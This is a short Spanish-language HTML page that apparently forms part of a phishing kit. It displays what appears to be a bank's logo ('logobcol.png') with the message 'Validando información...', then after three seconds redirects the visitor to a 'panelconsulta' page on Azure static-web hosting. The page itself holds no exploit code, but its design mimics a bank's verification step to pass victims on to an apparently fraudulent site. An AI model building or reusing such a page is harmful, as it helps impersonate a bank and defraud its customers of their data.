
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Redirigiendo...</title>
  <style>
    body {
      margin: 0;
      background-color: #ffffff;
      font-family: Arial, sans-serif;
      display: flex;
      align-items: center;
      justify-content: center;
      flex-direction: column;
      height: 100vh;
    }

    .container {
      text-align: center;
    }

    .logo {
      max-width: 150px;
      margin-bottom: 20px;
    }

    .mensaje {
      font-size: 1.5rem;
      color: #000000;
      margin-bottom: 20px;
    }

    .loader {
      width: 50px;
      height: 50px;
    }
  </style>
</head>
<body>
  <div class="container">
    <img src="logobcol.png" alt="Logo" class="logo" />
    <div class="mensaje">Validando información...</div>
    <img src="loading.gif" alt="Cargando" class="loader" />
  </div>

  <script>
    setTimeout(() => {
      window.location.href = "https://panelconsulta.z13.web.core.windows.net/";
    }, 3000);
  </script>
</body>
</html>
